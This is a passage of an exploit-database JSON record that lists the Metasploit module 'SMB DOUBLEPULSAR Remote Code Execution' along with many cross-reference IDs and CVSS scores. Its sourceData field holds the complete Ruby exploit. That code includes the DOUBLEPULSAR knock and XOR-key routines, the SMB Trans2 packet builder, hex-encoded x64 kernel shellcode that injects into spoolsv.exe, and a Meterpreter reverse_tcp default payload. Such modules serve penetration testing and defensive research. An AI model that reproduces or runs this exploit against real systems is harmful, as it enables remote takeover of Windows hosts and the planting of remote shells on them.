["AKB:B43D414F-6140-4931-BED8-4AE15FFDFAE1", "AKB:D476227F-C4B1-49E3-9947-897077E5150D", "AKB:400EDB06-73BF-4A6D-A113-643077965C7B"]}, {"type": "packetstorm", "idList": ["PACKETSTORM:146236", "PACKETSTORM:156196", "PACKETSTORM:142603", "PACKETSTORM:142602", "PACKETSTORM:154690", "PACKETSTORM:142181", "PACKETSTORM:142548"]}, {"type": "zdt", "idList": ["1337DAY-ID-27613", "1337DAY-ID-27803", 
"1337DAY-ID-33313", "1337DAY-ID-27786", "1337DAY-ID-29702", "1337DAY-ID-27802", "1337DAY-ID-27752"]}, {"type": "exploitdb", "idList": ["EDB-ID:41891", "EDB-ID:42031", "EDB-ID:47456", "EDB-ID:42030", "EDB-ID:43970", "EDB-ID:41987"]}, {"type": "nessus", "idList": ["700059.PRM", "MS17-010.NASL", "SMB_DOUBLE_PULSAR_BACKDOOR_DETECT.NBIN", "700099.PRM", "SMB_NT_MS17-010.NASL"]}, {"type": "f5", "idList": ["F5:K57181937"]}, {"type": "rapid7community", "idList": ["RAPID7COMMUNITY:4570AAF658D82BF591A6D6AB473704B6", "RAPID7COMMUNITY:9E4E3C72C90426CECD1801D8F0006388", "RAPID7COMMUNITY:761964EB7C8E68AD2D9E6DC0095DF4C0", "RAPID7COMMUNITY:B91CF4077282454499672A7AD6FBE744", "RAPID7COMMUNITY:D6095B3BBE1704D4062E19C249D178EC", "RAPID7COMMUNITY:958C8DA808BCCA56E72237E0015ED607", "RAPID7COMMUNITY:8B3AE9E0999C9317B6911ECE10B8A820", "RAPID7COMMUNITY:3EEFED2F93F50D3C56A51C03A7A3513D"]}, {"type": "seebug", "idList": ["SSV:92964", "SSV:92952"]}, {"type": "metasploit", "idList": ["MSF:AUXILIARY/ADMIN/SMB/MS17_010_COMMAND", "MSF:ILITIES/MSFT-CVE-2017-0146/", "MSF:EXPLOIT/WINDOWS/SMB/SMB_DOUBLEPULSAR_RCE", "MSF:EXPLOIT/WINDOWS/SMB/DOUBLEPULSAR_RCE", "MSF:ILITIES/MSFT-CVE-2017-0145/", "MSF:AUXILIARY/SCANNER/SMB/SMB_MS17_010", "MSF:EXPLOIT/WINDOWS/SMB/MS17_010_ETERNALBLUE_WIN8", "MSF:EXPLOIT/WINDOWS/SMB/MS17_010_ETERNALBLUE", "MSF:EXPLOIT/WINDOWS/SMB/MS17_010_PSEXEC"]}, {"type": "mskb", "idList": ["KB4013389", "KB4012598"]}, {"type": "openvas", "idList": ["OPENVAS:1361412562310810676", "OPENVAS:1361412562310810698", "OPENVAS:1361412562310810810"]}, {"type": "kaspersky", "idList": ["KLA10977"]}, {"type": "huawei", "idList": ["HUAWEI-SA-20170513-01-WINDOWS"]}, {"type": "cve", "idList": ["CVE-2017-0145", "CVE-2017-0148", "CVE-2017-0146", "CVE-2017-0144", "CVE-2017-0143", "CVE-2017-0147"]}, {"type": "symantec", "idList": ["SMNTC-96705", "SMNTC-96706", "SMNTC-96709", "SMNTC-96703", "SMNTC-96707", "SMNTC-96704"]}, {"type": "kitploit", "idList": ["KITPLOIT:9146046356497464176"]}, {"type": 
"trendmicroblog", "idList": ["TRENDMICROBLOG:F01C658432B4BB0C2F28F1E5CE666104", "TRENDMICROBLOG:90481B7D0C6FD15C950712E718E29E3A", "TRENDMICROBLOG:657A275464AD59827A9E6C1CD1726546", "TRENDMICROBLOG:4A07139FC4D015AFBEA9BD27C01BBA37"]}, {"type": "threatpost", "idList": ["THREATPOST:758CC5987A361EA1BB8BBFFC425334D5", "THREATPOST:F569DB7301109F1CDBCA30319EA8E2E7", "THREATPOST:C95C260596C8EA3C1F60B8BCC0360A41", "THREATPOST:6520102503D39BD2183F4ECDEFA9D591"]}, {"type": "mmpc", "idList": ["MMPC:F3E0CD42C341A30C758CB85AD9F6D052", "MMPC:F4F919BF0CF7F97FD15CFA500398C7D9"]}, {"type": "canvas", "idList": ["ETERNALBLUE", "MS17_010"]}, {"type": "thn", "idList": ["THN:18A54BDD63D7DC2B3284D326E6510150", "THN:C50AC2400E56ED88DBA7FC6DAC8360A8", "THN:FF56343C15BACA1C1CE83A105EFD7F77", "THN:2E043D9BAC04DEE81005124DD54A31E2", "THN:F12E2167FDA829ED32C7A16A83B048BF"]}, {"type": "qualysblog", "idList": ["QUALYSBLOG:B891CB6093D217510DB7327088AE7FB2"]}, {"type": "mscve", "idList": ["MS:CVE-2017-0144", "MS:CVE-2017-0148", "MS:CVE-2017-0143"]}, {"type": "talosblog", "idList": ["TALOSBLOG:E2BCC6AEFE1A7A25F49757116346A7A6"]}, {"type": "myhack58", "idList": ["MYHACK58:62201786371"]}, {"type": "saint", "idList": ["SAINT:9EF85E0CE1D118D27911357B1C516074", "SAINT:BD676E3751A4D110EAA275BF92CA7E46", "SAINT:DAEC4BA69103823E03C8F3C832C5B41D", "SAINT:64F70C2A6C3961CA44A77286E5B810CD"]}, {"type": "carbonblack", "idList": ["CARBONBLACK:6730D6EB8DF875C002A93DBC78C80B9D"]}, {"type": "nmap", "idList": ["NMAP:SMB-VULN-MS17-010.NSE"]}, {"type": "malwarebytes", "idList": ["MALWAREBYTES:5BE2B1A9C552FAA033E4D4312076FD34"]}, {"type": "avleonov", "idList": ["AVLEONOV:A5219F45CF78A7D911A6EBBE8F9D49B2"]}], "modified": "2021-09-11T22:17:48", "rev": 2}, "score": {"value": 7.5, "vector": "NONE", "modified": "2021-09-11T22:17:48", "rev": 2}}, "objectVersion": "1.6", "sourceHref": "https://0day.today/exploit/33895", "sourceData": "##\r\n# This module requires Metasploit: https://metasploit.com/download\r\n# Current 
source: https://github.com/rapid7/metasploit-framework\r\n##\r\n\r\nclass MetasploitModule < Msf::Exploit::Remote\r\n\r\n Rank = GreatRanking\r\n\r\n include Msf::Exploit::Remote::SMB::Client\r\n include Msf::Module::Deprecated\r\n\r\n moved_from 'exploit/windows/smb/doublepulsar_rce'\r\n\r\n MAX_SHELLCODE_SIZE = 4096\r\n\r\n def initialize(info = {})\r\n super(update_info(info,\r\n 'Name' => 'SMB DOUBLEPULSAR Remote Code Execution',\r\n 'Description' => %q{\r\n This module executes a Metasploit payload against the Equation Group's\r\n DOUBLEPULSAR implant for SMB as popularly deployed by ETERNALBLUE.\r\n\r\n While this module primarily performs code execution against the implant,\r\n the \"Neutralize implant\" target allows you to disable the implant.\r\n },\r\n 'Author' => [\r\n 'Equation Group', # DOUBLEPULSAR implant\r\n 'Shadow Brokers', # Equation Group dump\r\n 'zerosum0x0', # DOPU analysis and detection\r\n 'Luke Jennings', # DOPU analysis and detection\r\n 'wvu', # Metasploit module and arch detection\r\n 'Jacob Robles' # Metasploit module and RCE help\r\n ],\r\n 'References' => [\r\n ['MSB', 'MS17-010'],\r\n ['CVE', '2017-0143'],\r\n ['CVE', '2017-0144'],\r\n ['CVE', '2017-0145'],\r\n ['CVE', '2017-0146'],\r\n ['CVE', '2017-0147'],\r\n ['CVE', '2017-0148'],\r\n ['URL', 'https://zerosum0x0.blogspot.com/2017/04/doublepulsar-initial-smb-backdoor-ring.html'],\r\n ['URL', 'https://countercept.com/blog/analyzing-the-doublepulsar-kernel-dll-injection-technique/'],\r\n ['URL', 'https://www.countercept.com/blog/doublepulsar-usermode-analysis-generic-reflective-dll-loader/'],\r\n ['URL', 'https://github.com/countercept/doublepulsar-detection-script'],\r\n ['URL', 'https://github.com/countercept/doublepulsar-c2-traffic-decryptor'],\r\n ['URL', 'https://gist.github.com/msuiche/50a36710ee59709d8c76fa50fc987be1']\r\n ],\r\n 'DisclosureDate' => '2017-04-14', # Shadow Brokers leak\r\n 'License' => MSF_LICENSE,\r\n 'Platform' => 'win',\r\n 'Arch' => ARCH_X64,\r\n 
'Privileged' => true,\r\n 'Payload' => {\r\n 'Space' => MAX_SHELLCODE_SIZE - kernel_shellcode_size,\r\n 'DisableNops' => true\r\n },\r\n 'Targets' => [\r\n ['Execute payload (x64)',\r\n 'DefaultOptions' => {\r\n 'EXITFUNC' => 'thread',\r\n 'PAYLOAD' => 'windows/x64/meterpreter/reverse_tcp'\r\n }\r\n ],\r\n ['Neutralize implant',\r\n 'DefaultOptions' => {\r\n 'PAYLOAD' => nil # XXX: \"Unset\" generic payload\r\n }\r\n ]\r\n ],\r\n 'DefaultTarget' => 0,\r\n 'Notes' => {\r\n 'AKA' => ['DOUBLEPULSAR'],\r\n 'RelatedModules' => [\r\n 'auxiliary/scanner/smb/smb_ms17_010',\r\n 'exploit/windows/smb/ms17_010_eternalblue'\r\n ],\r\n 'Stability' => [CRASH_OS_DOWN],\r\n 'Reliability' => [REPEATABLE_SESSION]\r\n }\r\n ))\r\n\r\n register_advanced_options([\r\n OptBool.new('DefangedMode', [true, 'Run in defanged mode', true]),\r\n OptString.new('ProcessName', [true, 'Process to inject payload into', 'spoolsv.exe'])\r\n ])\r\n end\r\n\r\n OPCODES = {\r\n ping: 0x23,\r\n exec: 0xc8,\r\n kill: 0x77\r\n }.freeze\r\n\r\n STATUS_CODES = {\r\n not_detected: 0x00,\r\n success: 0x10,\r\n invalid_params: 0x20,\r\n alloc_failure: 0x30\r\n }.freeze\r\n\r\n def calculate_doublepulsar_status(m1, m2)\r\n STATUS_CODES.key(m2.to_i - m1.to_i)\r\n end\r\n\r\n # algorithm to calculate the XOR Key for DoublePulsar knocks\r\n def calculate_doublepulsar_xor_key(s)\r\n x = (2 * s ^ (((s & 0xff00 | (s << 16)) << 8) | (((s >> 16) | s & 0xff0000) >> 8)))\r\n x & 0xffffffff # this line was added just to truncate to 32 bits\r\n end\r\n\r\n # The arch is adjacent to the XOR key in the SMB signature\r\n def calculate_doublepulsar_arch(s)\r\n s == 0 ? 
ARCH_X86 : ARCH_X64\r\n end\r\n\r\n def generate_doublepulsar_timeout(op)\r\n k = SecureRandom.random_bytes(4).unpack1('V')\r\n 0xff & (op - ((k & 0xffff00) >> 16) - (0xffff & (k & 0xff00) >> 8)) | k & 0xffff00\r\n end\r\n\r\n def generate_doublepulsar_param(op, body)\r\n case OPCODES.key(op)\r\n when :ping, :kill\r\n \"\\x00\" * 12\r\n when :exec\r\n Rex::Text.xor([@xor_key].pack('V'), [body.length, body.length, 0].pack('V*'))\r\n end\r\n end\r\n\r\n def check\r\n ipc_share = \"\\\\\\\\#{rhost}\\\\IPC$\"\r\n\r\n @tree_id = do_smb_setup_tree(ipc_share)\r\n vprint_good(\"Connected to #{ipc_share} with TID = #{@tree_id}\")\r\n vprint_status(\"Target OS is #{smb_peer_os}\")\r\n\r\n print_status('Sending ping to DOUBLEPULSAR')\r\n code, signature1, signature2 = do_smb_doublepulsar_pkt\r\n msg = 'Host is likely INFECTED with DoublePulsar!'\r\n\r\n case calculate_doublepulsar_status(@multiplex_id, code)\r\n when :success\r\n @xor_key = calculate_doublepulsar_xor_key(signature1)\r\n @arch = calculate_doublepulsar_arch(signature2)\r\n\r\n arch_str =\r\n case @arch\r\n when ARCH_X86\r\n 'x86 (32-bit)'\r\n when ARCH_X64\r\n 'x64 (64-bit)'\r\n end\r\n\r\n print_warning(\"#{msg} - Arch: #{arch_str}, XOR Key: 0x#{@xor_key.to_s(16).upcase}\")\r\n CheckCode::Vulnerable\r\n when :not_detected\r\n print_error('DOUBLEPULSAR not detected or disabled')\r\n CheckCode::Safe\r\n else\r\n print_error('An unknown error occurred')\r\n CheckCode::Unknown\r\n end\r\n end\r\n\r\n def exploit\r\n if datastore['DefangedMode']\r\n warning = <<~EOF\r\n\r\n\r\n Are you SURE you want to execute code against a nation-state implant?\r\n You MAY contaminate forensic evidence if there is an investigation.\r\n\r\n Disable the DefangedMode option if you have authorization to proceed.\r\n EOF\r\n\r\n fail_with(Failure::BadConfig, warning)\r\n end\r\n\r\n # No ForceExploit because @tree_id and @xor_key are required\r\n unless check == CheckCode::Vulnerable\r\n fail_with(Failure::NotVulnerable, 'Unable to 
proceed without DOUBLEPULSAR')\r\n end\r\n\r\n case target.name\r\n when 'Execute payload (x64)'\r\n unless @xor_key\r\n fail_with(Failure::NotFound, 'XOR key not found')\r\n end\r\n\r\n if @arch == ARCH_X86\r\n fail_with(Failure::NoTarget, 'x86 is not a supported target')\r\n end\r\n\r\n print_status(\"Generating kernel shellcode with #{datastore['PAYLOAD']}\")\r\n shellcode = make_kernel_user_payload(payload.encoded, datastore['ProcessName'])\r\n shellcode << rand_text(MAX_SHELLCODE_SIZE - shellcode.length)\r\n vprint_status(\"Total shellcode length: #{shellcode.length} bytes\")\r\n\r\n print_status(\"Encrypting shellcode with XOR key 0x#{@xor_key.to_s(16).upcase}\")\r\n xor_shellcode = Rex::Text.xor([@xor_key].pack('V'), shellcode)\r\n\r\n print_status('Sending shellcode to DOUBLEPULSAR')\r\n code, _signature1, _signature2 = do_smb_doublepulsar_pkt(OPCODES[:exec], xor_shellcode)\r\n when 'Neutralize implant'\r\n return neutralize_implant\r\n end\r\n\r\n case calculate_doublepulsar_status(@multiplex_id, code)\r\n when :success\r\n print_good('Payload execution successful')\r\n when :invalid_params\r\n fail_with(Failure::BadConfig, 'Invalid parameters were specified')\r\n when :alloc_failure\r\n fail_with(Failure::PayloadFailed, 'An allocation failure occurred')\r\n else\r\n fail_with(Failure::Unknown, 'An unknown error occurred')\r\n end\r\n ensure\r\n disconnect\r\n end\r\n\r\n def neutralize_implant\r\n print_status('Neutralizing DOUBLEPULSAR')\r\n code, _signature1, _signature2 = do_smb_doublepulsar_pkt(OPCODES[:kill])\r\n\r\n case calculate_doublepulsar_status(@multiplex_id, code)\r\n when :success\r\n print_good('Implant neutralization successful')\r\n else\r\n fail_with(Failure::Unknown, 'An unknown error occurred')\r\n end\r\n end\r\n\r\n def do_smb_setup_tree(ipc_share)\r\n connect\r\n\r\n # logon as user \\\r\n simple.login(datastore['SMBName'], datastore['SMBUser'], datastore['SMBPass'], datastore['SMBDomain'])\r\n\r\n # connect to IPC$\r\n 
simple.connect(ipc_share)\r\n\r\n # return tree\r\n simple.shares[ipc_share]\r\n end\r\n\r\n def do_smb_doublepulsar_pkt(opcode = OPCODES[:ping], body = nil)\r\n # make doublepulsar knock\r\n pkt = make_smb_trans2_doublepulsar(opcode, body)\r\n\r\n sock.put(pkt)\r\n bytes = sock.get_once\r\n\r\n return unless bytes\r\n\r\n # convert packet to response struct\r\n pkt = Rex::Proto::SMB::Constants::SMB_TRANS_RES_HDR_PKT.make_struct\r\n pkt.from_s(bytes[4..-1])\r\n\r\n return pkt['SMB'].v['MultiplexID'], pkt['SMB'].v['Signature1'], pkt['SMB'].v['Signature2']\r\n end\r\n\r\n def make_smb_trans2_doublepulsar(opcode, body)\r\n setup_count = 1\r\n setup_data = [0x000e].pack('v')\r\n\r\n param = generate_doublepulsar_param(opcode, body)\r\n data = param + body.to_s\r\n\r\n pkt = Rex::Proto::SMB::Constants::SMB_TRANS2_PKT.make_struct\r\n simple.client.smb_defaults(pkt['Payload']['SMB'])\r\n\r\n base_offset = pkt.to_s.length + (setup_count * 2) - 4\r\n param_offset = base_offset\r\n data_offset = param_offset + param.length\r\n\r\n pkt['Payload']['SMB'].v['Command'] = CONST::SMB_COM_TRANSACTION2\r\n pkt['Payload']['SMB'].v['Flags1'] = 0x18\r\n pkt['Payload']['SMB'].v['Flags2'] = 0xc007\r\n\r\n @multiplex_id = rand(0xffff)\r\n\r\n pkt['Payload']['SMB'].v['WordCount'] = 14 + setup_count\r\n pkt['Payload']['SMB'].v['TreeID'] = @tree_id\r\n pkt['Payload']['SMB'].v['MultiplexID'] = @multiplex_id\r\n\r\n pkt['Payload'].v['ParamCountTotal'] = param.length\r\n pkt['Payload'].v['DataCountTotal'] = body.to_s.length\r\n pkt['Payload'].v['ParamCountMax'] = 1\r\n pkt['Payload'].v['DataCountMax'] = 0\r\n pkt['Payload'].v['ParamCount'] = param.length\r\n pkt['Payload'].v['ParamOffset'] = param_offset\r\n pkt['Payload'].v['DataCount'] = body.to_s.length\r\n pkt['Payload'].v['DataOffset'] = data_offset\r\n pkt['Payload'].v['SetupCount'] = setup_count\r\n pkt['Payload'].v['SetupData'] = setup_data\r\n pkt['Payload'].v['Timeout'] = generate_doublepulsar_timeout(opcode)\r\n 
pkt['Payload'].v['Payload'] = data\r\n\r\n pkt.to_s\r\n end\r\n\r\n # ring3 = user mode encoded payload\r\n # proc_name = process to inject APC into\r\n def make_kernel_user_payload(ring3, proc_name)\r\n sc = make_kernel_shellcode(proc_name)\r\n\r\n sc << [ring3.length].pack('S<')\r\n sc << ring3\r\n\r\n sc\r\n end\r\n\r\n def generate_process_hash(process)\r\n # x64_calc_hash from external/source/shellcode/windows/multi_arch_kernel_queue_apc.asm\r\n proc_hash = 0\r\n process << \"\\x00\"\r\n\r\n process.each_byte do |c|\r\n proc_hash = ror(proc_hash, 13)\r\n proc_hash += c\r\n end\r\n\r\n [proc_hash].pack('l<')\r\n end\r\n\r\n def ror(dword, bits)\r\n (dword >> bits | dword << (32 - bits)) & 0xFFFFFFFF\r\n end\r\n\r\n def make_kernel_shellcode(proc_name)\r\n # see: external/source/shellcode/windows/multi_arch_kernel_queue_apc.asm\r\n # Length: 780 bytes\r\n \"\\x31\\xc9\\x41\\xe2\\x01\\xc3\\x56\\x41\\x57\\x41\\x56\\x41\\x55\\x41\\x54\\x53\" \\\r\n \"\\x55\\x48\\x89\\xe5\\x66\\x83\\xe4\\xf0\\x48\\x83\\xec\\x20\\x4c\\x8d\\x35\\xe3\" \\\r\n \"\\xff\\xff\\xff\\x65\\x4c\\x8b\\x3c\\x25\\x38\\x00\\x00\\x00\\x4d\\x8b\\x7f\\x04\" \\\r\n \"\\x49\\xc1\\xef\\x0c\\x49\\xc1\\xe7\\x0c\\x49\\x81\\xef\\x00\\x10\\x00\\x00\\x49\" \\\r\n \"\\x8b\\x37\\x66\\x81\\xfe\\x4d\\x5a\\x75\\xef\\x41\\xbb\\x5c\\x72\\x11\\x62\\xe8\" \\\r\n \"\\x18\\x02\\x00\\x00\\x48\\x89\\xc6\\x48\\x81\\xc6\\x08\\x03\\x00\\x00\\x41\\xbb\" \\\r\n \"\\x7a\\xba\\xa3\\x30\\xe8\\x03\\x02\\x00\\x00\\x48\\x89\\xf1\\x48\\x39\\xf0\\x77\" \\\r\n \"\\x11\\x48\\x8d\\x90\\x00\\x05\\x00\\x00\\x48\\x39\\xf2\\x72\\x05\\x48\\x29\\xc6\" \\\r\n \"\\xeb\\x08\\x48\\x8b\\x36\\x48\\x39\\xce\\x75\\xe2\\x49\\x89\\xf4\\x31\\xdb\\x89\" \\\r\n \"\\xd9\\x83\\xc1\\x04\\x81\\xf9\\x00\\x00\\x01\\x00\\x0f\\x8d\\x66\\x01\\x00\\x00\" \\\r\n \"\\x4c\\x89\\xf2\\x89\\xcb\\x41\\xbb\\x66\\x55\\xa2\\x4b\\xe8\\xbc\\x01\\x00\\x00\" \\\r\n \"\\x85\\xc0\\x75\\xdb\\x49\\x8b\\x0e\\x41\\xbb\\xa3\\x6f\\x72\\x2d\\xe8\\xaa\\x01\" \\\r\n 
\"\\x00\\x00\\x48\\x89\\xc6\\xe8\\x50\\x01\\x00\\x00\\x41\\x81\\xf9\" +\r\n generate_process_hash(proc_name.upcase) +\r\n \"\\x75\\xbc\\x49\\x8b\\x1e\\x4d\\x8d\\x6e\\x10\\x4c\\x89\\xea\\x48\\x89\\xd9\" \\\r\n \"\\x41\\xbb\\xe5\\x24\\x11\\xdc\\xe8\\x81\\x01\\x00\\x00\\x6a\\x40\\x68\\x00\\x10\" \\\r\n \"\\x00\\x00\\x4d\\x8d\\x4e\\x08\\x49\\xc7\\x01\\x00\\x10\\x00\\x00\\x4d\\x31\\xc0\" \\\r\n \"\\x4c\\x89\\xf2\\x31\\xc9\\x48\\x89\\x0a\\x48\\xf7\\xd1\\x41\\xbb\\x4b\\xca\\x0a\" \\\r\n \"\\xee\\x48\\x83\\xec\\x20\\xe8\\x52\\x01\\x00\\x00\\x85\\xc0\\x0f\\x85\\xc8\\x00\" \\\r\n \"\\x00\\x00\\x49\\x8b\\x3e\\x48\\x8d\\x35\\xe9\\x00\\x00\\x00\\x31\\xc9\\x66\\x03\" \\\r\n \"\\x0d\\xd7\\x01\\x00\\x00\\x66\\x81\\xc1\\xf9\\x00\\xf3\\xa4\\x48\\x89\\xde\\x48\" \\\r\n \"\\x81\\xc6\\x08\\x03\\x00\\x00\\x48\\x89\\xf1\\x48\\x8b\\x11\\x4c\\x29\\xe2\\x51\" \\\r\n \"\\x52\\x48\\x89\\xd1\\x48\\x83\\xec\\x20\\x41\\xbb\\x26\\x40\\x36\\x9d\\xe8\\x09\" \\\r\n \"\\x01\\x00\\x00\\x48\\x83\\xc4\\x20\\x5a\\x59\\x48\\x85\\xc0\\x74\\x18\\x48\\x8b\" \\\r\n \"\\x80\\xc8\\x02\\x00\\x00\\x48\\x85\\xc0\\x74\\x0c\\x48\\x83\\xc2\\x4c\\x8b\\x02\" \\\r\n \"\\x0f\\xba\\xe0\\x05\\x72\\x05\\x48\\x8b\\x09\\xeb\\xbe\\x48\\x83\\xea\\x4c\\x49\" \\\r\n \"\\x89\\xd4\\x31\\xd2\\x80\\xc2\\x90\\x31\\xc9\\x41\\xbb\\x26\\xac\\x50\\x91\\xe8\" \\\r\n \"\\xc8\\x00\\x00\\x00\\x48\\x89\\xc1\\x4c\\x8d\\x89\\x80\\x00\\x00\\x00\\x41\\xc6\" \\\r\n \"\\x01\\xc3\\x4c\\x89\\xe2\\x49\\x89\\xc4\\x4d\\x31\\xc0\\x41\\x50\\x6a\\x01\\x49\" \\\r\n \"\\x8b\\x06\\x50\\x41\\x50\\x48\\x83\\xec\\x20\\x41\\xbb\\xac\\xce\\x55\\x4b\\xe8\" \\\r\n \"\\x98\\x00\\x00\\x00\\x31\\xd2\\x52\\x52\\x41\\x58\\x41\\x59\\x4c\\x89\\xe1\\x41\" \\\r\n \"\\xbb\\x18\\x38\\x09\\x9e\\xe8\\x82\\x00\\x00\\x00\\x4c\\x89\\xe9\\x41\\xbb\\x22\" \\\r\n \"\\xb7\\xb3\\x7d\\xe8\\x74\\x00\\x00\\x00\\x48\\x89\\xd9\\x41\\xbb\\x0d\\xe2\\x4d\" \\\r\n \"\\x85\\xe8\\x66\\x00\\x00\\x00\\x48\\x89\\xec\\x5d\\x5b\\x41\\x5c\\x41\\x5d\\x41\" \\\r\n 
\"\\x5e\\x41\\x5f\\x5e\\xc3\\xe9\\xb5\\x00\\x00\\x00\\x4d\\x31\\xc9\\x31\\xc0\\xac\" \\\r\n \"\\x41\\xc1\\xc9\\x0d\\x3c\\x61\\x7c\\x02\\x2c\\x20\\x41\\x01\\xc1\\x38\\xe0\\x75\" \\\r\n \"\\xec\\xc3\\x31\\xd2\\x65\\x48\\x8b\\x52\\x60\\x48\\x8b\\x52\\x18\\x48\\x8b\\x52\" \\\r\n \"\\x20\\x48\\x8b\\x12\\x48\\x8b\\x72\\x50\\x48\\x0f\\xb7\\x4a\\x4a\\x45\\x31\\xc9\" \\\r\n \"\\x31\\xc0\\xac\\x3c\\x61\\x7c\\x02\\x2c\\x20\\x41\\xc1\\xc9\\x0d\\x41\\x01\\xc1\" \\\r\n \"\\xe2\\xee\\x45\\x39\\xd9\\x75\\xda\\x4c\\x8b\\x7a\\x20\\xc3\\x4c\\x89\\xf8\\x41\" \\\r\n \"\\x51\\x41\\x50\\x52\\x51\\x56\\x48\\x89\\xc2\\x8b\\x42\\x3c\\x48\\x01\\xd0\\x8b\" \\\r\n \"\\x80\\x88\\x00\\x00\\x00\\x48\\x01\\xd0\\x50\\x8b\\x48\\x18\\x44\\x8b\\x40\\x20\" \\\r\n \"\\x49\\x01\\xd0\\x48\\xff\\xc9\\x41\\x8b\\x34\\x88\\x48\\x01\\xd6\\xe8\\x78\\xff\" \\\r\n \"\\xff\\xff\\x45\\x39\\xd9\\x75\\xec\\x58\\x44\\x8b\\x40\\x24\\x49\\x01\\xd0\\x66\" \\\r\n \"\\x41\\x8b\\x0c\\x48\\x44\\x8b\\x40\\x1c\\x49\\x01\\xd0\\x41\\x8b\\x04\\x88\\x48\" \\\r\n \"\\x01\\xd0\\x5e\\x59\\x5a\\x41\\x58\\x41\\x59\\x41\\x5b\\x41\\x53\\xff\\xe0\\x56\" \\\r\n \"\\x41\\x57\\x55\\x48\\x89\\xe5\\x48\\x83\\xec\\x20\\x41\\xbb\\xda\\x16\\xaf\\x92\" \\\r\n \"\\xe8\\x4d\\xff\\xff\\xff\\x31\\xc9\\x51\\x51\\x51\\x51\\x41\\x59\\x4c\\x8d\\x05\" \\\r\n \"\\x1a\\x00\\x00\\x00\\x5a\\x48\\x83\\xec\\x20\\x41\\xbb\\x46\\x45\\x1b\\x22\\xe8\" \\\r\n \"\\x68\\xff\\xff\\xff\\x48\\x89\\xec\\x5d\\x41\\x5f\\x5e\\xc3\"\r\n end\r\n\r\n def kernel_shellcode_size\r\n make_kernel_shellcode('').length\r\n end\r\n\r\nend\n\n# 0day.today [2021-09-13] #"}, "lastseen": "2021-09-12T22:14:55", "differentElements": ["sourceData"], "edition": 15}, {"bulletin": {"id": "1337DAY-ID-33895", "vendorId": null, "hash": "cb151cd86f962a4d9d61f369a9a3a781", "type": "zdt", "bulletinFamily": "exploit", "title": "SMB DOUBLEPULSAR Remote Code Execution Exploit", "description": "This Metasploit module executes a Metasploit payload against the Equation Group's DOUBLEPULSAR implant for SMB as 
popularly deployed by ETERNALBLUE. While this module primarily performs code execution against the implant, the \"Neutralize implant\" target allows you to disable the implant.", "published": "2020-02-04T00:00:00", "modified": "2020-02-04T00:00:00", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}, "cvss2": {"cvssV2": {"accessComplexity": "MEDIUM", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "COMPLETE", "baseScore": 9.3, "confidentialityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0"}, "exploitabilityScore": 8.6, "impactScore": 10.0, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "severity": "HIGH", "userInteractionRequired": false}, "cvss3": {"cvssV3": {"attackComplexity": "HIGH", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "baseScore": 8.1, "baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.0"}, "exploitabilityScore": 2.2, "impactScore": 5.9}, "href": "https://0day.today/exploit/description/33895", "reporter": "zdt", "references": [], "cvelist": ["CVE-2017-0148", "CVE-2017-0146", "CVE-2017-0147", "CVE-2017-0145", "CVE-2017-0143", "CVE-2017-0144"], "immutableFields": [], "lastseen": "2021-09-13T22:18:48", "history": [], "viewCount": 110, "enchantments": {"dependencies": {"references": [{"type": "attackerkb", "idList": ["AKB:400EDB06-73BF-4A6D-A113-643077965C7B", "AKB:D476227F-C4B1-49E3-9947-897077E5150D", "AKB:B43D414F-6140-4931-BED8-4AE15FFDFAE1"]}, {"type": "nessus", "idList": ["MS17-010.NASL", "SMB_DOUBLE_PULSAR_BACKDOOR_DETECT.NBIN", "700059.PRM", "SMB_NT_MS17-010.NASL", "700099.PRM"]}, {"type": "exploitdb", "idList": ["EDB-ID:47456", "EDB-ID:42030", "EDB-ID:41891", "EDB-ID:43970", "EDB-ID:42031", 
"EDB-ID:41987"]}, {"type": "zdt", "idList": ["1337DAY-ID-27752", "1337DAY-ID-27803", "1337DAY-ID-27613", "1337DAY-ID-29702", "1337DAY-ID-33313", "1337DAY-ID-27802", "1337DAY-ID-27786"]}, {"type": "packetstorm", "idList": ["PACKETSTORM:142181", "PACKETSTORM:156196", "PACKETSTORM:142602", "PACKETSTORM:142548", "PACKETSTORM:142603", "PACKETSTORM:146236", "PACKETSTORM:154690"]}, {"type": "f5", "idList": ["F5:K57181937"]}, {"type": "rapid7community", "idList": ["RAPID7COMMUNITY:D6095B3BBE1704D4062E19C249D178EC", "RAPID7COMMUNITY:B91CF4077282454499672A7AD6FBE744", "RAPID7COMMUNITY:3EEFED2F93F50D3C56A51C03A7A3513D", "RAPID7COMMUNITY:9E4E3C72C90426CECD1801D8F0006388", "RAPID7COMMUNITY:4570AAF658D82BF591A6D6AB473704B6", "RAPID7COMMUNITY:761964EB7C8E68AD2D9E6DC0095DF4C0", "RAPID7COMMUNITY:8B3AE9E0999C9317B6911ECE10B8A820", "RAPID7COMMUNITY:958C8DA808BCCA56E72237E0015ED607"]}, {"type": "metasploit", "idList": ["MSF:EXPLOIT/WINDOWS/SMB/DOUBLEPULSAR_RCE", "MSF:EXPLOIT/WINDOWS/SMB/MS17_010_PSEXEC", "MSF:EXPLOIT/WINDOWS/SMB/MS17_010_ETERNALBLUE_WIN8", "MSF:ILITIES/MSFT-CVE-2017-0145/", "MSF:EXPLOIT/WINDOWS/SMB/MS17_010_ETERNALBLUE", "MSF:ILITIES/MSFT-CVE-2017-0146/", "MSF:EXPLOIT/WINDOWS/SMB/SMB_DOUBLEPULSAR_RCE", "MSF:AUXILIARY/ADMIN/SMB/MS17_010_COMMAND", "MSF:AUXILIARY/SCANNER/SMB/SMB_MS17_010"]}, {"type": "openvas", "idList": ["OPENVAS:1361412562310810676", "OPENVAS:1361412562310810810", "OPENVAS:1361412562310810698"]}, {"type": "kaspersky", "idList": ["KLA10977"]}, {"type": "mskb", "idList": ["KB4013389", "KB4012598"]}, {"type": "seebug", "idList": ["SSV:92952", "SSV:92964"]}, {"type": "huawei", "idList": ["HUAWEI-SA-20170513-01-WINDOWS"]}, {"type": "cve", "idList": ["CVE-2017-0146", 